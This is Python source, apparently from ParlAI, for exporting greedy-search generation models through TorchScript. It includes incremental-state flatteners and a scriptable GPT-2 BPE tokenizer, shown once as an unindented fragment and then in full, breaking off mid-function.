self.encoder = torch.jit.trace(agent.model.encoder, sample_tokens)
self.decoder_first_pass = torch.jit.trace(wrapped_decoder, (
initial_generations, encoder_states), strict=False)
self.partially_traced_model = torch.jit.trace_module(wrapped_model,
{'output': latent[:, -1:, :],
'reorder_decoder_incremental_state': (initial_incr_state, torch
.tensor([0], dtype=torch.long, device=sample_tokens.device))},
strict=False)
self.decoder_later_pass = torch.jit.trace(wrapped_decoder, (
generations, encoder_states, incr_state), strict=False)
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def forward(self, context: str, max_len: int=128) ->str:
history_vecs: List[List[int]] = []
context_lines = context.split('\n')
if self.history_size > 0:
context_lines = context_lines[-self.history_size:]
for line in context_lines:
history_vecs.append(self.parse(line))
text_vecs: List[List[int]] = []
for vec in history_vecs[:-1]:
text_vecs += [vec]
text_vecs += [self.delimiter_tok]
text_vecs += [history_vecs[-1]]
if self.global_end_token is not None:
text_vecs += [[self.global_end_token]]
flattened_text_vec: List[int] = []
for vec in text_vecs:
for token in vec:
flattened_text_vec.append(token)
if self.text_truncate is not None:
if self.is_bart:
truncate_length = self.text_truncate - 2
else:
truncate_length = self.text_truncate
if len(flattened_text_vec) > truncate_length:
flattened_text_vec = flattened_text_vec[-truncate_length:]
flattened_text_vec = torch.tensor(flattened_text_vec, dtype=torch.long)
if self.is_bart:
flattened_text_vec = torch.cat([torch.tensor([self.start_idx],
dtype=torch.long), flattened_text_vec, torch.tensor([self.
end_idx], dtype=torch.long)], dim=0)
batch_text_vec = torch.unsqueeze(flattened_text_vec, dim=0)
encoder_states = self.encoder(batch_text_vec)
generations = self._get_initial_decoder_input(batch_text_vec)
seen_end = torch.zeros(batch_text_vec.size(0), device=
batch_text_vec.device, dtype=torch.bool)
incr_state: Dict[str, torch.Tensor] = {}
for token_idx in range(max_len):
if token_idx == 0:
latent, incr_state = self.decoder_first_pass(generations,
encoder_states)
else:
latent, incr_state = self.decoder_later_pass(generations,
encoder_states, incr_state)
logits = self.partially_traced_model.output(latent[:, -1:, :])
_, preds = logits.max(dim=2)
incr_state = (self.partially_traced_model.
reorder_decoder_incremental_state(incr_state, torch.tensor(
[0], dtype=torch.long, device=batch_text_vec.device)))
seen_end = seen_end + (preds == self.end_idx).squeeze(1)
generations = torch.cat([generations, preds], dim=1)
if torch.all(seen_end):
break
if self.is_bart:
assert generations[0, 0].item() == self.end_idx
generations = generations[:, 1:]
generation_tokens: List[int] = generations[0].tolist()
label = self._v2t(generation_tokens)
return label
class BaseIncrStateFlattener(nn.Module):
"""
Flatten/unflatten the incremental state for use with TorchScripting.
Typically, the incremental state will be stored as a Dict[int, Dict[str, Dict[str,
torch.Tensor]]], where the 3 dictionary levels map decoder layer, attention type,
and previous key/value/mask, respectively. However, TorchScript expects dicts to be
of type Dict[str, torch.Tensor], and thus all input incremental states when
TorchScripting will have to be of that type. We thus unflatten the input incremental
state, already of type Dict[str, torch.Tensor], to pass it into whatever method
needs it, and we flatten it again after the updated incremental state is passed back
out.
This is a base class that provides methods for flattening/unflattening: subclasses
will call these methods as the incremental state is passed into and out of their own
methods.
"""
def __init__(self, module: nn.Module):
super().__init__()
self.module = module
def _unflatten_incr_state(self, flat_incr_state: Dict[str, torch.Tensor]
) ->Dict[int, Dict[str, Dict[str, torch.Tensor]]]:
"""
Unflatten the input incremental state.
For instance, flat_incr_state['layer_0__self_attn__prev_key'] will be stored in
structured_incr_state[0]['self_attn']['prev_key'].
"""
structured_incr_state = defaultdict(lambda : defaultdict(dict))
for key, state in flat_incr_state.items():
layer_idx_str, attn_type, state_type = key.split('__')
structured_incr_state[int(layer_idx_str)][attn_type][state_type
] = state
return dict({k: dict(v) for k, v in structured_incr_state.items()})
def _flatten_incr_state(self, structured_incr_state: Dict[int, Dict[str,
Dict[str, torch.Tensor]]]) ->Dict[str, torch.Tensor]:
"""
Flatten the input incremental state.
For instance, structured_incr_state[0]['self_attn']['prev_key'] will be stored
in flat_incr_state['layer_0__self_attn__prev_key'].
"""
flat_incr_state = {}
for layer_idx, dict1 in structured_incr_state.items():
for attn_type, dict2 in dict1.items():
for state_type, state in dict2.items():
key = f'{layer_idx:d}__{attn_type}__{state_type}'
flat_incr_state[key] = state
return flat_incr_state
class DecoderIncrStateFlattener(BaseIncrStateFlattener):
"""
Wrapper for a TransformerDecoder that will unflatten/flatten the incremental state.
Unflattening/flattening will occur before passing the incremental state into and out
of .forward().
"""
def forward(self, input_: torch.LongTensor, encoder_state: Tuple[torch.
Tensor, torch.Tensor], flat_incr_state: Optional[Dict[str, torch.
Tensor]]=None) ->Tuple[torch.Tensor, Dict[str, torch.Tensor]]:
if flat_incr_state is not None:
structured_incr_state = self._unflatten_incr_state(flat_incr_state)
else:
structured_incr_state = None
tensor, new_structured_incr_state = self.module.forward(input=
input_, encoder_state=encoder_state, incr_state=
structured_incr_state)
new_flat_incr_state = self._flatten_incr_state(
new_structured_incr_state)
return tensor, new_flat_incr_state
class ModelIncrStateFlattener(BaseIncrStateFlattener):
"""
Wrapper for a TransformerGeneratorModel to unflatten/flatten the incremental state.
Unflattening/flattening will occur before passing the incremental state into and out
of .reorder_decoder_incremental_state(). We also support .output(), which is also
traced.
"""
def reorder_decoder_incremental_state(self, flat_incr_state: Dict[str,
torch.Tensor], inds: torch.Tensor) ->Dict[str, torch.Tensor]:
structured_incr_state = self._unflatten_incr_state(flat_incr_state)
new_structured_incr_state = (self.module.
reorder_decoder_incremental_state(incremental_state=
structured_incr_state, inds=inds))
return self._flatten_incr_state(new_structured_incr_state)
def output(self, tensor: torch.Tensor) ->torch.Tensor:
return self.module.output(tensor)
@torch.jit.script
class ScriptableGpt2BpeHelper(object):
"""
Version of parlai.utils.bpe.Gpt2BpeHelper that can be TorchScripted.
"""
@classmethod
def findall(cls, text: str) ->List[str]:
"""
Split tokens in a manner that replicates parlai.utils.bpe.Gpt2BpeHelper.
"""
contraction_endings = ['s', 't', 're', 've', 'm', 'll', 'd']
tokens: List[str] = []
idx = 0
num_passes = 0
while idx < len(text):
num_passes += 1
if num_passes > 10000:
return [
'*** Infinite loop in ScriptableGpt2BpeHelper.findall()! ***'
]
if text[idx] == "'":
captured_suffix = False
for ending in contraction_endings:
if text[idx + 1:idx + 1 + len(ending)] == ending:
tokens.append("'" + ending)
idx += 1 + len(ending)
captured_suffix = True
break
if captured_suffix:
continue
if not text[idx].isspace() or text[idx] == ' ' and idx + 1 < len(
text) and not text[idx + 1].isspace():
if text[idx] == ' ':
last_matching_idx = idx + 1
else:
last_matching_idx = idx
if text[last_matching_idx].isalpha():
while last_matching_idx + 1 < len(text) and text[
last_matching_idx + 1].isalpha():
last_matching_idx += 1
elif text[last_matching_idx].isnumeric():
while last_matching_idx + 1 < len(text) and text[
last_matching_idx + 1].isnumeric():
last_matching_idx += 1
else:
while last_matching_idx + 1 < len(text) and not text[
last_matching_idx + 1].isspace() and not text[
last_matching_idx + 1].isalpha() and not text[
last_matching_idx + 1].isnumeric():
last_matching_idx += 1
tokens.append(text[idx:last_matching_idx + 1])
idx = last_matching_idx + 1
continue
if idx + 1 < len(text) and text[idx + 1].isspace():
last_space_idx = idx + 1
while last_space_idx + 1 < len(text) and text[
last_space_idx + 1].isspace():
last_space_idx += 1
if last_space_idx + 1 == len(text):
tokens.append(text[idx:last_space_idx + 1])
idx = last_space_idx + 1
else:
tokens.append(text[idx:last_space_idx])
idx = last_space_idx
continue
if True:
last_space_idx = idx
while last_space_idx + 1 < len(text) and text[
last_space_idx + 1].isspace():
last_space_idx += 1
tokens.append(text[idx:last_space_idx + 1])
idx = last_space_idx + 1
return tokens
def __init__(self, add_prefix_space: bool, encoder: Dict[str, str],
byte_encoder: Dict[int, str], fused_key_bpe_ranks: Dict[str, float],
special_tokens: List[str]):
self.add_prefix_space = add_prefix_space
self.encoder = encoder
self.decoder: Dict[str, str] = {}
for k, v in self.encoder.items():
self.decoder[v] = k
self.byte_encoder = byte_encoder
self.byte_decoder: Dict[str, int] = {}
for k, v in self.byte_encoder.items():
self.byte_decoder[v] = k
self.bpe_ranks = fused_key_bpe_ranks
self._special_tokens: Dict[str, int] = {}
for st in special_tokens:
self._special_tokens[st] = 1
def encode(self, text: str) ->List[str]:
"""
Tokenize text.
Checks for add_prefix_space; handles accordingly.
:param text:
text to tokenize
:return tokens:
A list of tokens
"""
if self.add_prefix_space:
text = f' {text}'
FINAL = 1
SPLITABLE = 0
pieces: List[Tuple[str, int]] = [(text, SPLITABLE)]
for special_token in self._special_tokens.keys():
i = 0
while i < len(pieces):
subtext, status = pieces[i]
if status == FINAL:
i += 1
continue
split = subtext.split(special_token)
if len(split) > 1:
pieces.pop(i)
for j, piece in enumerate(split):
if j > 0:
pieces.insert(i + j, (special_token, FINAL))
pieces.insert(i + j + int(j > 0), (piece, SPLITABLE))
else:
i += 1
output: List[str] = []
for piece, state in pieces:
if state is FINAL:
output.append(piece)
else:
output += self.helper_encode(piece)
text = ''.join(output)
return output
def get_pairs(self, word: List[str]) ->List[Tuple[str, str]]:
"""
Return set of symbol pairs in a word.
Word is represented as list of symbols (symbols being variable-length strings).
:param word:
word to symbolize
:return pairs:
set of tuples of symbols
"""
pairs: List[Tuple[str, str]] = []
prev_char = word[0]
for char in word[1:]:
pairs.append((prev_char, char))
prev_char = char
return pairs
def bpe(self, word: List[str]) ->List[str]:
"""
Convert token to BPE.
:param word:
list of tokens token to convert
:return bpe_encoding:
string bpe encoding
"""
pairs = self.get_pairs(word)
if len(pairs) == 0:
return word
while True:
min_rank = self.bpe_ranks.get('\n'.join(pairs[0]), float('inf'))
bigram = pairs[0]
for pair in pairs[1:]:
current_rank = self.bpe_ranks.get('\n'.join(pair), float('inf')
)
if current_rank < min_rank:
min_rank = current_rank
bigram = pair
if '\n'.join(bigram) not in self.bpe_ranks:
break
first, second = bigram
new_word: List[str] = []
i = 0
while i < len(word):
found = False
for j in range(i, len(word)):
if word[j] == first:
new_word.extend(word[i:j])
i = j
found = True
break
if not found:
new_word.extend(word[i:])
break
if word[i] == first and i < len(word) - 1 and word[i + 1
] == second:
new_word.append(first + second)
i += 2
else:
new_word.append(word[i])
i += 1
word = new_word.copy()
if len(word) == 1:
break
else:
pairs = self.get_pairs(word)
return word
def helper_encode(self, text: str) ->List[str]:
"""
Tokenize text.
:param text:
text to tokenize
:return tokens:
A list of tokens
"""
bpe_tokens: List[str] = []
for token in self.findall(text):
byte_encoded: List[str] = []
for b in token:
byte_encoded.append(self.byte_encoder[ord(b)])
encoded: List[str] = []
for bpe_token in self.bpe(byte_encoded):
encoded.append(self.encoder[bpe_token])
bpe_tokens.extend(encoded)
return bpe_tokens
def decode(self, tokens: List[str]) ->str:
"""
Decode list of tokens into a text string.
:param tokens:
list of tokens
:return text:
decoded text
"""
output: List[str] = []
accum: List[str] = []
for token in tokens:
if token in self._special_tokens:
if len(accum) > 0:
output.append(self.helper_decode(accum))
accum.clear()
output.append(token)
else:
accum.append(token)
if len(accum) > 0:
output.append(self.helper_decode(accum))
text = ''.join(output)
if self.add_prefix_space:
assert text.startswith(' ')
text = text.lstrip(' ')
return text
def helper_decode(self, tokens: List[str]) ->str:
"""
Decode list of tokens into text string.
:param tokens:
list of tokens
:return:
decoded text
"""
chars: List[str] = []
for token in tokens:
decoded_token = self.decoder[token]
token_chars = self.utf8_chars(decoded_token)
for char in token_chars:
if not torch.jit.is_scripting():
chars.extend(list(char))
else:
chars.append(char)
decoded_chars: List[str] = []
for char in chars:
decoded_chars.append(chr(self.byte_decoder[char]))
return ''.join(decoded_chars)
def utf8_chars(self, s: str) ->List[str]:
"""
An implementation of UTF8 character iteration in TorchScript. There are no
bitwise operations in torchscript, so we compare directly to integer values.
There isn't a lot of validation, for instance if you pass in an improperly
encoded string with an out-of-place continuation byte, or with a non-left-to-
right byte order, you'll get unexpected results and likely throw. Torch itself
takes in unicode strings and encodes them as UTF8, so that should be actively
hard to do.
The logic is simple: looking at the current start-of-character byte.
If its high bit is 0, it's a 1-byte character. Otherwise, the number of
bytes is the number of leading 1s in its binary representation, so
find that number by comparing it directly to ints with the appropriate
representation, then append that many bytes as a character and move past
them to the next start byte.
From pytext.torchscript.utils.
"""
chars: List[str] = []
i = 0
while i < len(s):
byte = ord(s[i])
if byte < 128:
chars.append(s[i])
i += 1
else:
if byte < 224:
num_bytes = 2
elif byte < 240:
num_bytes = 3
elif byte < 248:
num_bytes = 4
elif byte < 252:
num_bytes = 5
elif byte < 254:
num_bytes = 6
elif byte < 255:
num_bytes = 7
else:
num_bytes = 8
chars.append(s[i:i + num_bytes])
i += num_bytes
return chars
@torch.jit.script
class ScriptableDictionaryAgent:
"""
Builds and/or loads a dictionary.
All code is TorchScriptable.
"""
def __init__(self, null_token: str, end_token: str, unk_token: str,
start_token: str, freq: Dict[str, int], tok2ind: Dict[str, int],
ind2tok: Dict[int, str], bpe_add_prefix_space: bool, bpe_encoder:
Dict[str, str], bpe_byte_encoder: Dict[int, str],
fused_key_bpe_ranks: Dict[str, float], special_tokens: List[str]):
self.null_token = null_token
self.end_token = end_token
self.unk_token = unk_token
self.start_token = start_token
self.freq = freq
self.tok2ind = tok2ind
self.ind2tok = ind2tok
self._unk_token_idx = self.tok2ind[self.unk_token]
self.bpe = ScriptableGpt2BpeHelper(add_prefix_space=
bpe_add_prefix_space, encoder=bpe_encoder, byte_encoder=
bpe_byte_encoder, fused_key_bpe_ranks=fused_key_bpe_ranks,
special_tokens=special_tokens)
def _word_lookup(self, key: str) ->int:
"""
Return index from token, or unk_token's index, or None.
"""
if key in self.tok2ind:
return self.tok2ind[key]
else:
return self._unk_token_idx
def _index_lookup(self, key: int) ->str:
"""
Return token from index, or unk_token.
"""
if key in self.ind2tok:
return self.ind2tok[key]
else:
return self.unk_token
def gpt2_tokenize(self, text: str):
"""
Tokenize using Gpt2 BPE tokenizer.
"""
return self.bpe_tokenize(text)
def tokenize(self, text: str) ->List[str]:
"""
Return a sequence of tokens from the iterable.
Also handles special tokens for some tokenizers
"""
word_tokens = self.gpt2_tokenize(text)
return word_tokens
def bpe_tokenize(self, text: str) ->List[str]:
"""
Return a sequence of BPE-tokens from the text.
"""
return self.bpe.encode(text)
def txt2vec(self, text: str) ->List[int]:
"""
Convert a string to a vector (list of ints).
First runs a sentence tokenizer, then a word tokenizer.
"""
itr: List[int] = []
for token in self.tokenize(str(text)):
itr.append(self._word_lookup(token))
return itr
def vec2txt(self, vector: List[int]) ->str:
"""
Convert a vector of IDs to a string.
Converts a vector (iterable of ints) into a string, with each token separated by
the delimiter (default ``' '``).
"""
tokens = [self._index_lookup(idx) for idx in vector]
text = self.bpe.decode(tokens)
return text
<|reserved_special_token_1|>
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from collections import defaultdict
from typing import List, Dict, Optional, Tuple
import torch.jit
from torch import nn as nn
from parlai.core.dict import DictionaryAgent
from parlai.core.torch_agent import TorchAgent
from parlai.utils.bpe import Gpt2BpeHelper
class TorchScriptGreedySearch(nn.Module):
"""
A helper class for exporting simple greedy-search models via TorchScript.
Models with extra inputs will need to override to include more variables.
"""
# We currently only support these specific dictionary settings
CAIRAOKE_DICT_PARAMS = {
"dict_class": "parlai.core.dict:DictionaryAgent",
"dict_initpath": None,
"dict_language": "english",
"dict_max_ngram_size": -1,
"dict_minfreq": 0,
"dict_maxtokens": -1,
"dict_tokenizer": "gpt2",
"dict_lower": False,
"dict_textfields": "text,labels",
"dict_loaded": True,
'bpe_debug': False,
}
def __init__(self, agent: TorchAgent):
super().__init__()
self.is_bart = agent.opt['model'] == 'bart'
# Dictionary/tokenization setup
for key, val in self.CAIRAOKE_DICT_PARAMS.items():
assert (
agent.opt.get(key, val) == val
), f'The only currently supported value of "{key}" is {val}!'
orig_dict: DictionaryAgent = agent.dict
orig_bpe: Gpt2BpeHelper = orig_dict.bpe
assert all(len(key) == 2 for key in orig_bpe.bpe_ranks.keys())
assert not any(
i for key in orig_bpe.bpe_ranks.keys() for i in key if '\n' in i
), "We need to temporarily merge the bpe_ranks dict's keys with a newline character in order to use it as a TorchScript arg, but at least one of the dict's keys contains a newline character already!"
fused_key_bpe_ranks = {
'\n'.join(key): float(val) for key, val in orig_bpe.bpe_ranks.items()
}
# Cast the values as floats to be able to compare to float('inf') when doing BPE
# splitting
self.dict = ScriptableDictionaryAgent(
null_token=orig_dict.null_token,
end_token=orig_dict.end_token,
unk_token=orig_dict.unk_token,
start_token=orig_dict.start_token,
freq=orig_dict.freq,
tok2ind=orig_dict.tok2ind,
ind2tok=orig_dict.ind2tok,
bpe_add_prefix_space=agent.opt['bpe_add_prefix_space'],
bpe_encoder=orig_bpe.encoder,
bpe_byte_encoder=orig_bpe.byte_encoder,
fused_key_bpe_ranks=fused_key_bpe_ranks,
special_tokens=agent._get_special_tokens(),
)
# History tracking and start/end tokens
self.delimiter_tok = agent.history.delimiter_tok
self.history_size = agent.opt['history_size']
if agent.opt.get('history_add_global_end_token', None) is not None:
self.global_end_token = agent.dict[agent.dict.end_token]
else:
self.global_end_token = None
self.text_truncate = agent.opt.get('text_truncate') or agent.opt['truncate']
self.text_truncate = self.text_truncate if self.text_truncate >= 0 else None
self.start_idx = agent.model.START_IDX
self.end_idx = agent.model.END_IDX
self.null_idx = agent.model.NULL_IDX
if self.is_bart:
self.initial_decoder_input = [self.end_idx, self.start_idx]
else:
self.initial_decoder_input = [self.start_idx]
agent.model.eval()
# Create versions of the model and decoder that will flatten the incremental
# state dict, as required by TorchScript
wrapped_decoder = DecoderIncrStateFlattener(agent.model.decoder)
wrapped_model = ModelIncrStateFlattener(agent.model)
# Create sample inputs for tracing
sample_tokens = torch.tensor([[1, 2, 3, 4, 5]], dtype=torch.long)
encoder_states = agent.model.encoder(sample_tokens)
initial_generations = self._get_initial_decoder_input(sample_tokens)
latent, initial_incr_state = wrapped_decoder(
initial_generations, encoder_states
)
logits = agent.model.output(latent[:, -1:, :])
_, preds = logits.max(dim=2)
incr_state = {k: torch.clone(v) for k, v in initial_incr_state.items()}
# Copy the initial incremental state, used when tracing the
# .reorder_decoder_incremental_state() method below, to avoid having it be
# mutated by the following line
incr_state = wrapped_model.reorder_decoder_incremental_state(
incr_state, torch.tensor([0], dtype=torch.long, device=sample_tokens.device)
)
generations = torch.cat([initial_generations, preds], dim=1)
# Do tracing
self.encoder = torch.jit.trace(agent.model.encoder, sample_tokens)
self.decoder_first_pass = torch.jit.trace(
wrapped_decoder, (initial_generations, encoder_states), strict=False
)
# We do strict=False to avoid an error when passing a Dict out of
# decoder.forward()
self.partially_traced_model = torch.jit.trace_module(
wrapped_model,
{
'output': (latent[:, -1:, :]),
'reorder_decoder_incremental_state': (
initial_incr_state,
torch.tensor([0], dtype=torch.long, device=sample_tokens.device),
),
},
strict=False,
)
self.decoder_later_pass = torch.jit.trace(
wrapped_decoder, (generations, encoder_states, incr_state), strict=False
)
def _get_initial_decoder_input(self, x: torch.Tensor) -> torch.Tensor:
"""
Workaround because we can't use TGM._get_initial_decoder_input() directly.
When we try to call that function, we get a "RuntimeError: Type 'Tuple[int,
int]' cannot be traced. Only Tensors and (possibly nested) Lists, Dicts, and
Tuples of Tensors can be traced" error.
"""
bsz = x.size(0)
return (
torch.tensor(self.initial_decoder_input, dtype=torch.long)
.expand(bsz, len(self.initial_decoder_input))
.to(x.device)
)
def parse(self, text: str) -> List[int]:
return self.dict.txt2vec(text)
def _v2t(self, vec: List[int]) -> str:
"""
Convert token indices to string of tokens.
"""
new_vec: List[int] = []
for i in vec:
if i == self.end_idx:
break
elif i != self.start_idx:
new_vec.append(i)
return self.dict.vec2txt(new_vec)
def forward(self, context: str, max_len: int = 128) -> str:
# Vectorize all lines of context
history_vecs: List[List[int]] = []
context_lines = context.split('\n')
if self.history_size > 0:
context_lines = context_lines[-self.history_size :]
for line in context_lines:
history_vecs.append(self.parse(line))
# Get full history vec
text_vecs: List[List[int]] = []
for vec in history_vecs[:-1]:
text_vecs += [vec]
text_vecs += [self.delimiter_tok]
text_vecs += [history_vecs[-1]]
if self.global_end_token is not None:
text_vecs += [[self.global_end_token]]
# Flatten text_vecs
flattened_text_vec: List[int] = []
for vec in text_vecs:
for token in vec:
flattened_text_vec.append(token)
# Format history vec given various logic
if self.text_truncate is not None:
if self.is_bart:
truncate_length = self.text_truncate - 2 # Start and end tokens
else:
truncate_length = self.text_truncate
if len(flattened_text_vec) > truncate_length:
flattened_text_vec = flattened_text_vec[-truncate_length:]
flattened_text_vec = torch.tensor(flattened_text_vec, dtype=torch.long)
if self.is_bart:
flattened_text_vec = torch.cat(
[
torch.tensor([self.start_idx], dtype=torch.long),
flattened_text_vec,
torch.tensor([self.end_idx], dtype=torch.long),
],
dim=0,
)
# Pass through the encoder and decoder to generate tokens
batch_text_vec = torch.unsqueeze(flattened_text_vec, dim=0) # Add batch dim
encoder_states = self.encoder(batch_text_vec)
generations = self._get_initial_decoder_input(batch_text_vec)
# keep track of early stopping if all generations finish
seen_end = torch.zeros(
batch_text_vec.size(0), device=batch_text_vec.device, dtype=torch.bool
)
incr_state: Dict[str, torch.Tensor] = {}
for token_idx in range(max_len):
if token_idx == 0:
latent, incr_state = self.decoder_first_pass(
generations, encoder_states
)
else:
latent, incr_state = self.decoder_later_pass(
generations, encoder_states, incr_state
)
logits = self.partially_traced_model.output(latent[:, -1:, :])
_, preds = logits.max(dim=2)
incr_state = self.partially_traced_model.reorder_decoder_incremental_state(
incr_state,
torch.tensor([0], dtype=torch.long, device=batch_text_vec.device),
)
seen_end = seen_end + (preds == self.end_idx).squeeze(1)
generations = torch.cat([generations, preds], dim=1)
if torch.all(seen_end):
break
# Get the label from the generated tokens and update the history
if self.is_bart:
assert generations[0, 0].item() == self.end_idx
generations = generations[:, 1:]
# Hack: remove initial end token. I haven't found in the code where this is
# done, but it seems to happen early on during generation
generation_tokens: List[int] = generations[0].tolist()
label = self._v2t(generation_tokens)
return label
class BaseIncrStateFlattener(nn.Module):
"""
Flatten/unflatten the incremental state for use with TorchScripting.
Typically, the incremental state will be stored as a Dict[int, Dict[str, Dict[str,
torch.Tensor]]], where the 3 dictionary levels map decoder layer, attention type,
and previous key/value/mask, respectively. However, TorchScript expects dicts to be
of type Dict[str, torch.Tensor], and thus all input incremental states when
TorchScripting will have to be of that type. We thus unflatten the input incremental
state, already of type Dict[str, torch.Tensor], to pass it into whatever method
needs it, and we flatten it again after the updated incremental state is passed back
out.
This is a base class that provides methods for flattening/unflattening: subclasses
will call these methods as the incremental state is passed into and out of their own
methods.
"""
def __init__(self, module: nn.Module):
super().__init__()
self.module = module
def _unflatten_incr_state(
self, flat_incr_state: Dict[str, torch.Tensor]
) -> Dict[int, Dict[str, Dict[str, torch.Tensor]]]:
"""
Unflatten the input incremental state.
For instance, flat_incr_state['layer_0__self_attn__prev_key'] will be stored in
structured_incr_state[0]['self_attn']['prev_key'].
"""
structured_incr_state = defaultdict(lambda: defaultdict(dict))
for key, state in flat_incr_state.items():
layer_idx_str, attn_type, state_type = key.split('__')
structured_incr_state[int(layer_idx_str)][attn_type][state_type] = state
return dict({k: dict(v) for k, v in structured_incr_state.items()})
# Turn the nested defaultdicts back into regular dicts
def _flatten_incr_state(
self, structured_incr_state: Dict[int, Dict[str, Dict[str, torch.Tensor]]]
) -> Dict[str, torch.Tensor]:
"""
Flatten the input incremental state.
For instance, structured_incr_state[0]['self_attn']['prev_key'] will be stored
in flat_incr_state['layer_0__self_attn__prev_key'].
"""
flat_incr_state = {}
for layer_idx, dict1 in structured_incr_state.items():
for attn_type, dict2 in dict1.items():
for state_type, state in dict2.items():
key = f'{layer_idx:d}__{attn_type}__{state_type}'
flat_incr_state[key] = state
return flat_incr_state
class DecoderIncrStateFlattener(BaseIncrStateFlattener):
"""
Wrapper for a TransformerDecoder that will unflatten/flatten the incremental state.
Unflattening/flattening will occur before passing the incremental state into and out
of .forward().
"""
def forward(
self,
input_: torch.LongTensor,
encoder_state: Tuple[torch.Tensor, torch.Tensor],
flat_incr_state: Optional[Dict[str, torch.Tensor]] = None,
) -> Tuple[torch.Tensor, Dict[str, torch.Tensor]]:
if flat_incr_state is not None:
structured_incr_state = self._unflatten_incr_state(flat_incr_state)
else:
structured_incr_state = None
tensor, new_structured_incr_state = self.module.forward(
input=input_, encoder_state=encoder_state, incr_state=structured_incr_state
)
new_flat_incr_state = self._flatten_incr_state(new_structured_incr_state)
return tensor, new_flat_incr_state
class ModelIncrStateFlattener(BaseIncrStateFlattener):
"""
Wrapper for a TransformerGeneratorModel to unflatten/flatten the incremental state.
Unflattening/flattening will occur before passing the incremental state into and out
of .reorder_decoder_incremental_state(). We also support .output(), which is also
traced.
"""
def reorder_decoder_incremental_state(
self, flat_incr_state: Dict[str, torch.Tensor], inds: torch.Tensor
) -> Dict[str, torch.Tensor]:
structured_incr_state = self._unflatten_incr_state(flat_incr_state)
new_structured_incr_state = self.module.reorder_decoder_incremental_state(
incremental_state=structured_incr_state, inds=inds
)
return self._flatten_incr_state(new_structured_incr_state)
def output(self, tensor: torch.Tensor) -> torch.Tensor:
return self.module.output(tensor)
@torch.jit.script
class ScriptableGpt2BpeHelper(object):
"""
Version of parlai.utils.bpe.Gpt2BpeHelper that can be TorchScripted.
"""
@classmethod
def findall(cls, text: str) -> List[str]:
"""
Split tokens in a manner that replicates parlai.utils.bpe.Gpt2BpeHelper.
"""
contraction_endings = ['s', 't', 're', 've', 'm', 'll', 'd']
tokens: List[str] = []
idx = 0
num_passes = 0
while idx < len(text):
num_passes += 1
if num_passes > 10000:
return ['*** Infinite loop in ScriptableGpt2BpeHelper.findall()! ***']
if text[idx] == "'":
# Capture contradiction suffixes
captured_suffix = False
for ending in contraction_endings:
if text[idx + 1 : idx + 1 + len(ending)] == ending:
tokens.append("'" + ending)
idx += 1 + len(ending)
captured_suffix = True
break
if captured_suffix:
continue
if not text[idx].isspace() or (
text[idx] == ' ' and idx + 1 < len(text) and not text[idx + 1].isspace()
):
# Capture runs of one type of character
if text[idx] == ' ':
last_matching_idx = idx + 1
else:
last_matching_idx = idx
if text[last_matching_idx].isalpha():
while (
last_matching_idx + 1 < len(text)
and text[last_matching_idx + 1].isalpha()
):
last_matching_idx += 1
elif text[last_matching_idx].isnumeric():
while (
last_matching_idx + 1 < len(text)
and text[last_matching_idx + 1].isnumeric()
):
last_matching_idx += 1
else:
while (
last_matching_idx + 1 < len(text)
and not text[last_matching_idx + 1].isspace()
and not text[last_matching_idx + 1].isalpha()
and not text[last_matching_idx + 1].isnumeric()
):
last_matching_idx += 1
tokens.append(text[idx : last_matching_idx + 1])
idx = last_matching_idx + 1
continue
if idx + 1 < len(text) and text[idx + 1].isspace():
# Capture runs of space characters up until just before the final one
last_space_idx = idx + 1
while (
last_space_idx + 1 < len(text)
and text[last_space_idx + 1].isspace()
):
last_space_idx += 1
if last_space_idx + 1 == len(text):
# Include the last char, which is a space char
tokens.append(text[idx : last_space_idx + 1])
idx = last_space_idx + 1
else:
tokens.append(text[idx:last_space_idx])
idx = last_space_idx
continue
if True:
# Capture runs of space characters
last_space_idx = idx
while (
last_space_idx + 1 < len(text)
and text[last_space_idx + 1].isspace()
):
last_space_idx += 1
tokens.append(text[idx : last_space_idx + 1])
idx = last_space_idx + 1
return tokens
def __init__(
self,
add_prefix_space: bool,
encoder: Dict[str, str],
byte_encoder: Dict[int, str],
fused_key_bpe_ranks: Dict[str, float],
special_tokens: List[str],
):
self.add_prefix_space = add_prefix_space
self.encoder = encoder
self.decoder: Dict[str, str] = {}
for k, v in self.encoder.items():
self.decoder[v] = k
self.byte_encoder = byte_encoder
self.byte_decoder: Dict[str, int] = {}
for k, v in self.byte_encoder.items():
self.byte_decoder[v] = k
self.bpe_ranks = fused_key_bpe_ranks
# special tokens
self._special_tokens: Dict[str, int] = {}
for st in special_tokens:
self._special_tokens[st] = 1
def encode(self, text: str) -> List[str]:
"""
Tokenize text.
Checks for add_prefix_space; handles accordingly.
:param text:
text to tokenize
:return tokens:
A list of tokens
"""
if self.add_prefix_space:
text = f' {text}'
# constants for readability
FINAL = 1
SPLITABLE = 0
pieces: List[Tuple[str, int]] = [(text, SPLITABLE)]
for special_token in self._special_tokens.keys():
i = 0
while i < len(pieces):
subtext, status = pieces[i]
if status == FINAL:
i += 1
continue
split = subtext.split(special_token)
if len(split) > 1:
# special token detected, replace the chunk with small subchunks
# split by the special token
pieces.pop(i)
for j, piece in enumerate(split):
if j > 0:
# add the special token as a delimiter
pieces.insert(i + j, (special_token, FINAL))
pieces.insert(i + j + int(j > 0), (piece, SPLITABLE))
else:
i += 1
output: List[str] = []
for piece, state in pieces:
if state is FINAL:
output.append(piece)
else:
output += self.helper_encode(piece)
text = ''.join(output)
return output
def get_pairs(self, word: List[str]) -> List[Tuple[str, str]]:
"""
Return set of symbol pairs in a word.
Word is represented as list of symbols (symbols being variable-length strings).
:param word:
word to symbolize
:return pairs:
set of tuples of symbols
"""
pairs: List[Tuple[str, str]] = []
prev_char = word[0]
for char in word[1:]:
pairs.append((prev_char, char))
prev_char = char
return pairs
def bpe(self, word: List[str]) -> List[str]:
"""
Convert token to BPE.
:param word:
list of tokens token to convert
:return bpe_encoding:
string bpe encoding
"""
pairs = self.get_pairs(word)
if len(pairs) == 0:
return word
while True:
min_rank = self.bpe_ranks.get('\n'.join(pairs[0]), float('inf'))
bigram = pairs[0]
for pair in pairs[1:]:
current_rank = self.bpe_ranks.get('\n'.join(pair), float('inf'))
if current_rank < min_rank:
min_rank = current_rank
bigram = pair
if '\n'.join(bigram) not in self.bpe_ranks:
break
first, second = bigram
new_word: List[str] = []
i = 0
while i < len(word):
found = False
for j in range(i, len(word)):
if word[j] == first:
